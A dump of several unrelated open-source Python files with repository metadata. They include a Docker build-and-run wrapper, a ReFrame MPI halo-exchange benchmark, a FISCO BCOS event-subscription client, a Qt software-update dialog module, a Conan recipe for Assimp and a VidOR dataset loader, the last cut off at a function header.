not-nexus/shelf
|
ea59703082402ad3b6454482f0487418295fbd19
|
[
"MIT"
] | 2
|
2017-01-24T14:36:04.000Z
|
2020-01-13T16:10:05.000Z
|
#!/usr/bin/env python
import docopt
from shelf.bulk_update.utils import run
doc = """Usage: ./update-search-index [options] <config-path>
Options:
-b --bucket bucket The name of the bucket, or buckets that you
would like to rebuild the search index for.
If this is not sent along, all buckets will
be rebuilt. If multiple buckets are provided
they should be comma separated.
Example: -b "bucket1, bucket2, etc.."
-c --chunk-size chunk-size How many artifacts (per bucket) should be
processed at once.
[default: 20]
-v --verbose If set, the log level will be set to DEBUG.
Arguments:
<config-path> Path to the yaml configuration file.
"""
args = docopt.docopt(doc)
run(args)
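# Illustrative sketch (not part of the original script): parse a sample command line
# instead of sys.argv to inspect the dict that `run` receives. The bucket names and
# config path are hypothetical.
def _example_args():
    return docopt.docopt(doc, argv=["-b", "bucket1, bucket2", "-c", "50", "shelf.yaml"])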
| 37.481481
| 81
| 0.499012
|
91616a80184b52ab46dccf79fd5420217f8cc819
| 118
|
py
|
Python
|
n2w_it/__init__.py
|
IlGalvo/N2W-IT
|
5dd0ce1c688d2e1e25feb484b93f4ea83394824e
|
[
"MIT"
] | 1
|
2021-03-29T11:51:25.000Z
|
2021-03-29T11:51:25.000Z
|
n2w_it/__init__.py
|
IlGalvo/N2W-IT
|
5dd0ce1c688d2e1e25feb484b93f4ea83394824e
|
[
"MIT"
] | null | null | null |
n2w_it/__init__.py
|
IlGalvo/N2W-IT
|
5dd0ce1c688d2e1e25feb484b93f4ea83394824e
|
[
"MIT"
] | null | null | null |
__author__ = "Andrea Galvani"
__email__ = "Andrea.Galvani96@outlook.com"
__version__ = "1.0.1"
from .n2w_it import *
| 19.666667
| 42
| 0.737288
|
d87029ab643909ccbdbb6934a43ef8d386817362
| 515
|
py
|
Python
|
webdev/fornecedores/migrations/0018_auto_20210524_1806.py
|
h-zanetti/jewelry-manager
|
74166b89f492303b8ebf5ff8af058f394eb2a28b
|
[
"MIT"
] | null | null | null |
webdev/fornecedores/migrations/0018_auto_20210524_1806.py
|
h-zanetti/jewelry-manager
|
74166b89f492303b8ebf5ff8af058f394eb2a28b
|
[
"MIT"
] | 103
|
2021-04-25T21:28:11.000Z
|
2022-03-15T01:36:31.000Z
|
webdev/fornecedores/migrations/0018_auto_20210524_1806.py
|
h-zanetti/jewelry-manager
|
74166b89f492303b8ebf5ff8af058f394eb2a28b
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-05-24 21:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('fornecedores', '0017_auto_20210520_1847'),
]
operations = [
migrations.AlterField(
model_name='dadosbancarios',
name='tipo_de_transacao',
field=models.CharField(choices=[('', 'Tipo de Transação'), ('dp', 'Depósito'), ('px', 'Pix')], max_length=2, verbose_name='Tipo de Transação'),
),
]
| 27.105263
| 155
| 0.617476
|
eac28bcd365a2a919beca9f8de527baa4cb54e1e
| 2,216
|
py
|
Python
|
src/quico.py
|
JohannHospice/quico
|
3936c1849c06b93b4d167734e526a5526cc7b053
|
[
"MIT"
] | null | null | null |
src/quico.py
|
JohannHospice/quico
|
3936c1849c06b93b4d167734e526a5526cc7b053
|
[
"MIT"
] | null | null | null |
src/quico.py
|
JohannHospice/quico
|
3936c1849c06b93b4d167734e526a5526cc7b053
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import argparse
import subprocess
def main():
args, unknown_joined = parse_known_args()
build_cmd = CommandBuilder(['docker', 'build'])
build_cmd.append_with_option('-f', args.file)
build_cmd.append_with_option('-t', args.tag)
build_cmd.append(args.directory)
run_cmd = CommandBuilder(['docker', 'run'])
run_cmd.append_with_option('--network', args.network)
for volume in args.volume if args.volume else []:
run_cmd.append_with_option('-v', volume)
run_cmd.append_with_option('-p', args.publish)
run_cmd.append_with_option('-ti', args.tag)
run_cmd.append(unknown_joined)
    try:
read_proc('build', build_cmd.build())
read_proc('run', run_cmd.build())
except Exception as e:
print(e)
def parse_known_args():
    parser = argparse.ArgumentParser(description='Quico (quick-container) builds and then quickly runs a docker container.')
    parser.add_argument('directory', help='Directory in which to build the docker image.')
    parser.add_argument('-t', '--tag', required=True)
    parser.add_argument('-n', '--network', help="Network in which to run the docker container", default='bridge', required=False)
    parser.add_argument('-f', '--file', help="Path to the Dockerfile to build", default='Dockerfile', required=False)
parser.add_argument('-p', '--publish', required=False)
parser.add_argument('-v', '--volume', action='append', required=False)
args, unknown = parser.parse_known_args()
unknown_joined = ' '.join(unknown)
return args, unknown_joined
def read_proc(title, cmd):
print(f"+{title}: start ({cmd})")
try:
subprocess.check_call(cmd, shell=True)
except:
raise Exception(f"+{title}: raised error")
class CommandBuilder:
cmd = []
def __init__(self, cmd):
self.cmd = cmd
def append_with_option(self, option, value):
if value:
self.cmd.append(option)
self.cmd.append(value)
return self
def append(self, text):
self.cmd.append(text)
return self
def build(self):
return " ".join(self.cmd)
if __name__ == '__main__':
main()
| 31.657143
| 139
| 0.657491
|
0c82e334b65819d5d953cce17a9ef92ead5d98f2
| 7,065
|
py
|
Python
|
cscs-checks/microbenchmarks/mpi/halo_exchange/halo_cell_exchange.py
|
CLIP-HPC/reframe
|
eddf0b2508c2ba644e4c3aba5652e57fddfde106
|
[
"BSD-3-Clause"
] | 167
|
2017-11-14T20:37:28.000Z
|
2022-03-31T11:19:18.000Z
|
cscs-checks/microbenchmarks/mpi/halo_exchange/halo_cell_exchange.py
|
CLIP-HPC/reframe
|
eddf0b2508c2ba644e4c3aba5652e57fddfde106
|
[
"BSD-3-Clause"
] | 2,190
|
2017-06-14T12:48:13.000Z
|
2022-03-31T16:09:51.000Z
|
cscs-checks/microbenchmarks/mpi/halo_exchange/halo_cell_exchange.py
|
victorusu/reframe
|
e98078a990e31a47604b06d674e4ee730c22cd44
|
[
"BSD-3-Clause"
] | 83
|
2017-05-29T19:12:16.000Z
|
2022-03-18T09:49:21.000Z
|
# Copyright 2016-2021 Swiss National Supercomputing Centre (CSCS/ETH Zurich)
# ReFrame Project Developers. See the top-level LICENSE file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
import reframe as rfm
import reframe.utility.sanity as sn
@rfm.simple_test
class HaloCellExchangeTest(rfm.RegressionTest):
def __init__(self):
self.sourcepath = 'halo_cell_exchange.c'
self.build_system = 'SingleSource'
self.build_system.cflags = ['-O2']
self.valid_systems = ['daint:gpu', 'dom:gpu', 'daint:mc', 'dom:mc',
'arolla:cn', 'tsa:cn', 'eiger:mc', 'pilatus:mc']
self.valid_prog_environs = ['PrgEnv-cray', 'PrgEnv-gnu', 'PrgEnv-pgi',
'PrgEnv-nvidia']
self.num_tasks = 6
self.num_tasks_per_node = 1
self.num_gpus_per_node = 0
self.executable_opts = ['input.txt']
self.sanity_patterns = sn.assert_eq(
sn.count(sn.findall(r'halo_cell_exchange', self.stdout)), 9)
self.perf_patterns = {
'time_2_10': sn.extractsingle(
r'halo_cell_exchange 6 2 1 1 10 10 10'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_2_10000': sn.extractsingle(
r'halo_cell_exchange 6 2 1 1 10000 10000 10000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_2_1000000': sn.extractsingle(
r'halo_cell_exchange 6 2 1 1 1000000 1000000 1000000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_4_10': sn.extractsingle(
r'halo_cell_exchange 6 2 2 1 10 10 10'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_4_10000': sn.extractsingle(
r'halo_cell_exchange 6 2 2 1 10000 10000 10000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_4_1000000': sn.extractsingle(
r'halo_cell_exchange 6 2 2 1 1000000 1000000 1000000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_6_10': sn.extractsingle(
r'halo_cell_exchange 6 3 2 1 10 10 10'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_6_10000': sn.extractsingle(
r'halo_cell_exchange 6 3 2 1 10000 10000 10000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float),
'time_6_1000000': sn.extractsingle(
r'halo_cell_exchange 6 3 2 1 1000000 1000000 1000000'
r' \S+ (?P<time_mpi>\S+)', self.stdout,
'time_mpi', float)
}
self.reference = {
'dom:mc': {
'time_2_10': (3.925395e-06, None, 0.50, 's'),
'time_2_10000': (9.721279e-06, None, 0.50, 's'),
'time_2_1000000': (4.934530e-04, None, 0.50, 's'),
'time_4_10': (5.878997e-06, None, 0.50, 's'),
'time_4_10000': (1.495080e-05, None, 0.50, 's'),
'time_4_1000000': (6.791397e-04, None, 0.50, 's'),
'time_6_10': (5.428815e-06, None, 0.50, 's'),
'time_6_10000': (1.540580e-05, None, 0.50, 's'),
'time_6_1000000': (9.179296e-04, None, 0.50, 's')
},
'daint:mc': {
'time_2_10': (1.5e-05, None, 0.50, 's'),
'time_2_10000': (9.1e-05, None, 0.50, 's'),
'time_2_1000000': (7.9e-04, None, 0.50, 's'),
'time_4_10': (3e-05, None, 0.50, 's'),
'time_4_10000': (1.3e-04, None, 0.50, 's'),
'time_4_1000000': (6.791397e-04, None, 0.50, 's'),
'time_6_10': (3.5e-05, None, 0.50, 's'),
'time_6_10000': (1.2e-04, None, 0.50, 's'),
'time_6_1000000': (9.179296e-04, None, 0.50, 's')
},
'dom:gpu': {
'time_2_10': (3.925395e-06, None, 0.50, 's'),
'time_2_10000': (9.721279e-06, None, 0.50, 's'),
'time_2_1000000': (4.934530e-04, None, 0.50, 's'),
'time_4_10': (5.878997e-06, None, 0.50, 's'),
'time_4_10000': (1.495080e-05, None, 0.50, 's'),
'time_4_1000000': (6.791397e-04, None, 0.50, 's'),
'time_6_10': (5.428815e-06, None, 0.50, 's'),
'time_6_10000': (1.540580e-05, None, 0.50, 's'),
'time_6_1000000': (9.179296e-04, None, 0.50, 's')
},
'daint:gpu': {
'time_2_10': (1.5e-05, None, 0.50, 's'),
'time_2_10000': (9.1e-05, None, 0.50, 's'),
'time_2_1000000': (7.9e-04, None, 0.50, 's'),
'time_4_10': (3e-05, None, 0.50, 's'),
'time_4_10000': (1.3e-04, None, 0.50, 's'),
'time_4_1000000': (6.791397e-04, None, 0.50, 's'),
'time_6_10': (3.5e-05, None, 0.50, 's'),
'time_6_10000': (1.2e-04, None, 0.50, 's'),
'time_6_1000000': (9.179296e-04, None, 0.50, 's')
},
'eiger:mc': {
'time_2_10': (3.46e-06, None, 0.50, 's'),
'time_2_10000': (8.51e-06, None, 0.50, 's'),
'time_2_1000000': (2.07e-04, None, 0.50, 's'),
'time_4_10': (4.46e-06, None, 0.50, 's'),
'time_4_10000': (1.08e-05, None, 0.50, 's'),
'time_4_1000000': (3.55e-04, None, 0.50, 's'),
'time_6_10': (4.53e-06, None, 0.50, 's'),
'time_6_10000': (1.04e-05, None, 0.50, 's'),
'time_6_1000000': (3.55e-04, None, 0.50, 's')
},
'pilatus:mc': {
'time_2_10': (3.46e-06, None, 0.50, 's'),
'time_2_10000': (8.51e-06, None, 0.50, 's'),
'time_2_1000000': (2.07e-04, None, 0.50, 's'),
'time_4_10': (4.46e-06, None, 0.50, 's'),
'time_4_10000': (1.08e-05, None, 0.50, 's'),
'time_4_1000000': (3.55e-04, None, 0.50, 's'),
'time_6_10': (4.53e-06, None, 0.50, 's'),
'time_6_10000': (1.04e-05, None, 0.50, 's'),
'time_6_1000000': (3.55e-04, None, 0.50, 's')
},
}
self.maintainers = ['AJ']
self.strict_check = False
self.tags = {'benchmark'}
@run_before('compile')
def pgi_workaround(self):
if self.current_system.name in ['daint', 'dom']:
if self.current_environ.name == 'PrgEnv-pgi':
self.variables = {
'CUDA_HOME': '$CUDATOOLKIT_HOME',
}
if self.current_environ.name == 'PrgEnv-nvidia':
self.skip_if(self.current_system.name == 'eiger')
self.skip_if(self.current_system.name == 'pilatus')
| 46.788079
| 78
| 0.479264
|
f39573bcdad939b3695a2ff240cd6ace61a22524
| 6,380
|
py
|
Python
|
event_callback.py
|
KyrinCode/python-sdk
|
57dd02388d6b8552ad346d72838c2fd8177fec65
|
[
"MIT"
] | 61
|
2019-07-03T07:40:17.000Z
|
2022-03-06T13:30:53.000Z
|
event_callback.py
|
KyrinCode/python-sdk
|
57dd02388d6b8552ad346d72838c2fd8177fec65
|
[
"MIT"
] | 105
|
2019-07-25T08:48:59.000Z
|
2022-03-23T03:47:34.000Z
|
event_callback.py
|
KyrinCode/python-sdk
|
57dd02388d6b8552ad346d72838c2fd8177fec65
|
[
"MIT"
] | 61
|
2019-07-03T06:58:42.000Z
|
2022-02-16T08:50:14.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
FISCO BCOS/Python-SDK is a python client for FISCO BCOS2.0 (https://github.com/FISCO-BCOS/)
FISCO BCOS/Python-SDK is free software: you can redistribute it and/or modify it under the
terms of the MIT License as published by the Free Software Foundation. This project is
distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Thanks for
authors and contributors of eth-abi, eth-account, eth-hash,eth-keys, eth-typing, eth-utils,
rlp, eth-rlp , hexbytes ... and relative projects
@author: kentzhang
@date: 2019-06
'''
import sys
from client.bcosclient import BcosClient
import os
from client_config import client_config
from client.stattool import StatTool
from client.datatype_parser import DatatypeParser
from client.common.compiler import Compiler
from client_config import client_config
from client.bcoserror import BcosException, BcosError
from client.contractnote import ContractNote
from eth_utils import encode_hex, decode_hex
import uuid
from eth_utils.crypto import keccak
import json
import struct
from utils.encoding import FriendlyJsonSerde
from client.bcoserror import BcosError, ChannelException
from eth_utils import (to_text, to_bytes)
from client.channel_push_dispatcher import ChannelPushHandler
from client.channelpack import ChannelPack
def usage():
    usagetext = 'params: [contractname] [address (may be "last")] [event_name] [indexed value (zero or more, per the event definition)]\n\n'
    usagetext = usagetext + "\te.g.: for the sample contract [contracts/HelloEvent.sol], use the cmdline:\n\n"
usagetext = usagetext + "\tpython event_callback.py HelloEvent last on_set \n"
usagetext = usagetext + \
"\tpython event_callback.py HelloEvent last on_number 5\n\n...(and other events)"
print(usagetext)
class EventPushHandler01(ChannelPushHandler):
parser = DatatypeParser()
def on_push(self, packmsg: ChannelPack):
print("--------------------EventPushHandler01", packmsg.detail())
strmsg = packmsg.data.decode("utf-8")
response = json.loads(strmsg)
loglist = parser.parse_event_logs(response["logs"])
print("FilterID ", response["filterID"])
print("--------------------EventPushHandler01", json.dumps(loglist, indent=4))
class EventPushHandler02(ChannelPushHandler):
parser = DatatypeParser()
def on_push(self, packmsg: ChannelPack):
print(">>>>>>>>>>>>>>>>>>EventPushHandler02", packmsg.detail())
strmsg = packmsg.data.decode("utf-8")
response = json.loads(strmsg)
loglist = parser.parse_event_logs(response["logs"])
print("FilterID ", response["filterID"])
print(">>>>>>>>>>>>>>>>>>EventPushHandler02", json.dumps(loglist, indent=4))
parser: DatatypeParser = None
client: BcosClient = None
eventHandler01 = EventPushHandler01()
eventHandler02 = EventPushHandler02()
def format_event_register_request(
from_block,
to_block,
addresses,
topics,
groupid="1",
filterid=None):
'''
{
"fromBlock": "latest",
"toBlock": "latest",
"addresses": [
0xca5ed56862869c25da0bdf186e634aac6c6361ee
],
"topics": [
"0x91c95f04198617c60eaf2180fbca88fc192db379657df0e412a9f7dd4ebbe95d"
],
"groupID": "1",
"filterID": "bb31e4ec086c48e18f21cb994e2e5967"
}'''
request = dict()
request["fromBlock"] = from_block
request["toBlock"] = to_block
request["addresses"] = addresses
request["topics"] = topics
request["groupID"] = groupid
if filterid is None:
seq = uuid.uuid1()
filterid = seq.hex
request["filterID"] = filterid
requestJson = FriendlyJsonSerde().json_encode(request)
return requestJson
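def _example_register_request():
    # Illustrative sketch (not part of the original script): build the register payload
    # for the address and topic shown in the docstring above; a filterID is generated
    # automatically when none is supplied.
    return format_event_register_request(
        "latest", "latest",
        ["0xca5ed56862869c25da0bdf186e634aac6c6361ee"],
        ["0x91c95f04198617c60eaf2180fbca88fc192db379657df0e412a9f7dd4ebbe95d"])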
def register_event_callback(addresses, event_name, indexed_value):
topics = []
topic0 = parser.topic_from_event_name(event_name)
topics.append(topic0)
event_abi = parser.event_name_map[event_name]
print("event abi:", event_abi)
if len(indexed_value) > 0:
indexedinput = []
for input in event_abi["inputs"]:
if input["indexed"] is True:
indexedinput.append((input['name'], input['type']))
print(indexedinput)
i = 0
for v in indexed_value:
itype = indexedinput[i][1]
topic = DatatypeParser.topic_from_type(itype, v)
if not (topic is None):
topics.append(topic)
i = i + 1
requestJson = format_event_register_request("latest", "latest", addresses, topics)
requestbytes = ChannelPack.pack_amop_topic_message("", requestJson)
client.channel_handler.pushDispacher.add_handler(ChannelPack.EVENT_LOG_PUSH, eventHandler01)
client.channel_handler.pushDispacher.add_handler(ChannelPack.EVENT_LOG_PUSH, eventHandler02)
response = client.channel_handler.make_channel_request(requestbytes,
ChannelPack.CLIENT_REGISTER_EVENT_LOG,
ChannelPack.CLIENT_REGISTER_EVENT_LOG)
(topic, result) = ChannelPack.unpack_amop_topic_message(response)
dataobj = json.loads(result)
print(
"after register ,event_name:{},topic:{},result:{}".format(
event_name,
topic,
dataobj['result']))
# abi address event_name indexed_value
def main(argv):
global parser
global client
if len(argv) < 3:
usage()
exit(0)
contractname = argv[0]
address = argv[1]
event_name = argv[2]
indexed_value = argv[3:]
try:
print("usage input {},{},{},{}".format(contractname, address, event_name, indexed_value))
if address == "last":
cn = ContractNote()
address = cn.get_last(contractname)
print("hex address :", address)
abifile = "contracts/" + contractname + ".abi"
parser = DatatypeParser(abifile)
client = BcosClient()
print(client.getinfo())
register_event_callback([address], event_name, indexed_value)
except Exception as e:
import traceback
traceback.print_exc()
client.finish()
import time
time.sleep(0.5)
sys.exit(-1)
if __name__ == "__main__":
main(sys.argv[1:])
| 35.444444
| 109
| 0.670846
|
2c146b5c3b1a1974b34c4daff216ed3881890272
| 4,547
|
py
|
Python
|
pysparkle/frontend/qt.py
|
macdems/pysparkle
|
7d6018e5f2010d6a79fe71bc972bd29c61a113bc
|
[
"MIT"
] | 1
|
2015-12-19T19:25:15.000Z
|
2015-12-19T19:25:15.000Z
|
pysparkle/frontend/qt.py
|
macdems/pysparkle
|
7d6018e5f2010d6a79fe71bc972bd29c61a113bc
|
[
"MIT"
] | null | null | null |
pysparkle/frontend/qt.py
|
macdems/pysparkle
|
7d6018e5f2010d6a79fe71bc972bd29c61a113bc
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2015-2016 Maciej Dems <maciej.dems@p.lodz.pl>
# See LICENSE file for copyright information.
import sys
if 'PySide6' in sys.modules:
from PySide6.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec'
elif 'PyQt6' in sys.modules:
from PyQt6.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec'
elif 'PySide2' in sys.modules:
from PySide2.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec_'
elif 'PyQt5' in sys.modules:
from PyQt5.QtWidgets import QMessageBox, QLabel, QTextEdit
_exec_attr = 'exec_'
else:
if 'PySide' in sys.modules:
from PySide.QtGui import QMessageBox, QLabel, QTextEdit
elif 'PyQt4' in sys.modules:
from PyQt4.QtGui import QMessageBox, QLabel, QTextEdit
else:
raise ImportError("cannot determine Qt bindings: import desired Qt module first")
_exec_attr = 'exec_'
QMessageBox.ButtonRole.YesRole = QMessageBox.YesRole
QMessageBox.ButtonRole.NoRole = QMessageBox.NoRole
QMessageBox.ButtonRole.RejectRole = QMessageBox.RejectRole
QMessageBox.StandardButton.Ok = QMessageBox.Ok
QMessageBox.StandardButton.Yes = QMessageBox.Yes
QMessageBox.StandardButton.No = QMessageBox.No
def ask_for_autocheck(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Question)
dialog.setWindowTitle(dialog.tr("Check for updates automatically?"))
dialog.setText(dialog.tr("Should {} automatically check for updates?").format(pysparkle.appname))
dialog.setInformativeText(dialog.tr("You can always check for updates manually from the menu."))
dialog.setStandardButtons(QMessageBox.StandardButton.Yes | QMessageBox.StandardButton.No)
result = getattr(dialog, _exec_attr)()
return result == QMessageBox.StandardButton.Yes
def update_error(msg=None):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Critical)
dialog.setWindowTitle(dialog.tr("Update Error!"))
dialog.setText(dialog.tr("An error occurred in retrieving update information; "
"are you connected to the internet? Please try again later."))
if msg is not None:
dialog.setDetailedText(msg)
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def no_info(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Warning)
dialog.setWindowTitle(dialog.tr("No update information!"))
dialog.setText(dialog.tr("There is no update information for {}.\n\n"
"Maybe the software is not supported for your operating system...")
.format(pysparkle.appname))
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def no_update(pysparkle):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Information)
dialog.setWindowTitle(dialog.tr("You're up to date!"))
dialog.setText(dialog.tr("{} {} is currently the newest version available.")
.format(pysparkle.appname, pysparkle.appver))
dialog.setStandardButtons(QMessageBox.StandardButton.Ok)
getattr(dialog, _exec_attr)()
def update_available(pysparkle, maxitem, items):
dialog = QMessageBox()
dialog.setIcon(QMessageBox.Icon.Information)
dialog.setWindowTitle(dialog.tr("A new version of {} is available!").format(pysparkle.appname))
dialog.setText(dialog.tr("{} {} is now available (you have {}).\n\nWould you like to download it now?")
.format(pysparkle.appname, maxitem['version'], pysparkle.appver))
if any(item['notes'] for item in items):
grid = dialog.layout()
label = QLabel(dialog.tr("Release notes:"))
grid.addWidget(label, grid.rowCount(), 0, 1, grid.columnCount())
notes = QTextEdit()
notes.setText("<br/>\n".join("<h3>{title}</h3>\n{notes}\n".format(**item) for item in items))
notes.setFixedHeight(200)
notes.setReadOnly(True)
grid.addWidget(notes, grid.rowCount(), 0, 1, grid.columnCount())
dialog.updateGeometry()
get_button = dialog.addButton(dialog.tr("Get update"), QMessageBox.ButtonRole.YesRole)
skip_button = dialog.addButton(dialog.tr("Skip this version"), QMessageBox.ButtonRole.NoRole)
later_button = dialog.addButton(dialog.tr("Remind me later"), QMessageBox.ButtonRole.RejectRole)
getattr(dialog, _exec_attr)()
result = dialog.clickedButton()
if result in (get_button, skip_button):
return result == get_button
| 45.47
| 107
| 0.710798
|
3788d7c3d4ca83cde1621bc7f858b8fc2b420806
| 2,367
|
py
|
Python
|
salt/salt/custom/tests/multi_breakout_test.py
|
stirlab/headless-selenium-test-server
|
0faa49c9bfbc3cc168033134bc1c5e901b086235
|
[
"MIT"
] | 2
|
2017-11-30T08:49:04.000Z
|
2018-05-14T22:49:24.000Z
|
salt/salt/custom/tests/multi_breakout_test.py
|
stirlab/headless-selenium-test-server
|
0faa49c9bfbc3cc168033134bc1c5e901b086235
|
[
"MIT"
] | null | null | null |
salt/salt/custom/tests/multi_breakout_test.py
|
stirlab/headless-selenium-test-server
|
0faa49c9bfbc3cc168033134bc1c5e901b086235
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import signal
import sys
import time
from selenium.common.exceptions import StaleElementReferenceException
from selenium.common.exceptions import WebDriverException
import test_common as common
import test_config as config
from user_map import user_map
session_map = {
"webrtc-test.stirlab.local": {
"join_number": 1,
"mute": False,
},
"webrtc-test-base.stirlab.net": {
"join_number": 1,
"mute": False,
},
"webrtc-test-0.stirlab.net": {
"join_number": 1,
"mute": False,
},
"webrtc-test-1.stirlab.net": {
"join_number": 1,
"mute": True,
},
"webrtc-test-2.stirlab.net": {
"join_number": 2,
"mute": False,
},
"webrtc-test-3.stirlab.net": {
"join_number": 2,
"mute": True,
},
"webrtc-test-4.stirlab.net": {
"join_number": 3,
"mute": False,
},
"webrtc-test-5.stirlab.net": {
"join_number": 3,
"mute": True,
},
"webrtc-test-6.stirlab.net": {
"join_number": 4,
"mute": False,
},
"webrtc-test-7.stirlab.net": {
"join_number": 4,
"mute": True,
},
"webrtc-test-8.stirlab.net": {
"join_number": 5,
"mute": False,
},
"webrtc-test-9.stirlab.net": {
"join_number": 5,
"mute": True,
},
}
def usage():
print("Usage: %s" % sys.argv[0])
print("Configuration variables set in test_config.py")
if len(sys.argv) > 2:
    usage()
    sys.exit(1)
data = None
if len(sys.argv) > 1:
data = sys.argv[1]
def exit_callback():
try:
driver.quit()
except NameError:
print("No driver instance to close")
common.setup_signal_handlers(exit_callback)
hostname = common.hostname_slug()
user_id = None
if hostname in user_map:
user_id = user_map[hostname]["user_id_1"]
else:
print("ERROR: %s does not map to a valid user ID" % hostname)
sys.exit(1)
options = common.setup_chrome()
driver = common.make_driver(options)
main_room_url = common.make_main_room_url(user_id, data)
try:
common.shape_traffic(hostname)
driver.get(main_room_url)
while True:
if not common.global_pause:
common.manage_main_room(driver, True)
common.manage_breakout(driver, session_map[hostname]["join_number"], session_map[hostname]["mute"])
time.sleep(config.page_wait_time)
except WebDriverException as e:
common.clear_traffic_shaping()
print("ERROR: Webdriver error: %s" % e)
# Wait for SIGINT.
signal.pause()
| 21.518182
| 105
| 0.661174
|
8563090ea581688e9772d7c8c3a969d1a7caceb1
| 2,865
|
py
|
Python
|
conanfile.py
|
BentouDev/AssimpConan
|
34b86b571f939b107ef69ef3011e1615ca1b63c9
|
[
"MIT"
] | null | null | null |
conanfile.py
|
BentouDev/AssimpConan
|
34b86b571f939b107ef69ef3011e1615ca1b63c9
|
[
"MIT"
] | null | null | null |
conanfile.py
|
BentouDev/AssimpConan
|
34b86b571f939b107ef69ef3011e1615ca1b63c9
|
[
"MIT"
] | null | null | null |
from conans import ConanFile, CMake, tools
import os, platform
assimp_version = os.getenv('ASSIMP_VERSION', '0.0')
assimp_commit = os.getenv('ASSIMP_COMMIT', '')
class AssimpConan(ConanFile):
name = "assimp"
license = "MIT"
url = "https://github.com/BentouDev/AssimpConan"
version = assimp_version
commit = assimp_commit
description = "Assimp conan package"
homepage = "https://github.com/assimp/assimp"
settings = "os", "compiler", "build_type", "arch"
generators = "cmake"
exports_sources = ["assimp-source/*"]
options = {"shared": [True, False]}
default_options = {"shared":"True"}
def source(self):
if platform.system() != "Windows":
return
# This small hack might be useful to guarantee proper /MT /MD linkage in MSVC
# if the packaged project doesn't have variables to set it properly
print (' [*] Injecting conanbuildinfo.cmake...')
tools.replace_in_file("%s/CMakeLists.txt" % ("assimp-source"), "PROJECT( Assimp )",
"""PROJECT( Assimp )
include(${CMAKE_BINARY_DIR}/conanbuildinfo.cmake)
conan_basic_setup()""")
def build(self):
# Workaround for conan choosing cmake embedded in Visual Studio
if platform.system() == "Windows" and 'AZURE' in os.environ:
cmake_path = '"C:\\Program Files\\CMake\\bin\\cmake.exe"'
print (' [DEBUG] Forcing CMake : ' + cmake_path)
os.environ['CONAN_CMAKE_PROGRAM'] = cmake_path
cmake = CMake(self)
cmake.definitions["ASSIMP_BUILD_TESTS"] = "OFF"
cmake.definitions["ASSIMP_BUILD_SAMPLES"] = "OFF"
cmake.definitions["ASSIMP_BUILD_ASSIMP_TOOLS"] = "OFF"
if self.settings.os == "Windows":
if self.settings.compiler == "gcc":
cmake.definitions["CONAN_CXX_FLAGS"].join("-Wa,-mbig-obj")
#elif self.settings.compiler == "Visual Studio":
# cmake.definitions["CONAN_CXX_FLAGS"].append("/bigobj")
cmake.configure(source_folder = "assimp-source")
cmake.build()
def package(self):
# source code
self.copy("*.h", dst="include", src="assimp-source/include")
self.copy("*.hpp", dst="include", src="assimp-source/include")
self.copy("*.inl", dst="include", src="assimp-source/include")
# generated config.h file
self.copy("*.h", dst="include", src="include")
if self.settings.os == "Windows":
self.copy("*.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
else:
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.dylib", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self, folder="lib")
| 37.207792
| 92
| 0.616056
|
0289e8392361b366bf62daa231a49bc023afe32f
| 3,058
|
py
|
Python
|
dataset/vidor_hoid_mini.py
|
sx14/ST-HOID-helper
|
f0822307fe03548c92dc1e2ef80bb738ed0bd3f5
|
[
"MIT"
] | null | null | null |
dataset/vidor_hoid_mini.py
|
sx14/ST-HOID-helper
|
f0822307fe03548c92dc1e2ef80bb738ed0bd3f5
|
[
"MIT"
] | null | null | null |
dataset/vidor_hoid_mini.py
|
sx14/ST-HOID-helper
|
f0822307fe03548c92dc1e2ef80bb738ed0bd3f5
|
[
"MIT"
] | null | null | null |
import os
import glob
from tqdm import tqdm
from dataset import DatasetV1
class VidOR_HOID(DatasetV1):
"""
VidOR-HOID dataset
"""
def __init__(self, anno_rpath, video_rpath, splits, low_memory=True):
"""
anno_rpath: the root path of annotations
video_rpath: the root path of videos
splits: a list of splits in the dataset to load
low_memory: if true, do not load memory-costly part
of annotations (trajectories) into memory
"""
super(VidOR_HOID, self).__init__(anno_rpath, video_rpath, splits, low_memory)
print('VidOR-HOID-mini dataset loaded. {}'.format('(low memory mode enabled)' if low_memory else ''))
def _get_anno_files(self, split):
anno_files = glob.glob(os.path.join(self.anno_rpath, '{}/*/*.json'.format(split)))
assert len(anno_files)>0, 'No annotation file found for \'{}\'. Please check if the directory is correct.'.format(split)
return anno_files
def get_video_path(self, vid):
return os.path.join(self.video_rpath, self.annos[vid]['video_path'])
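def _example_load_validation_split():
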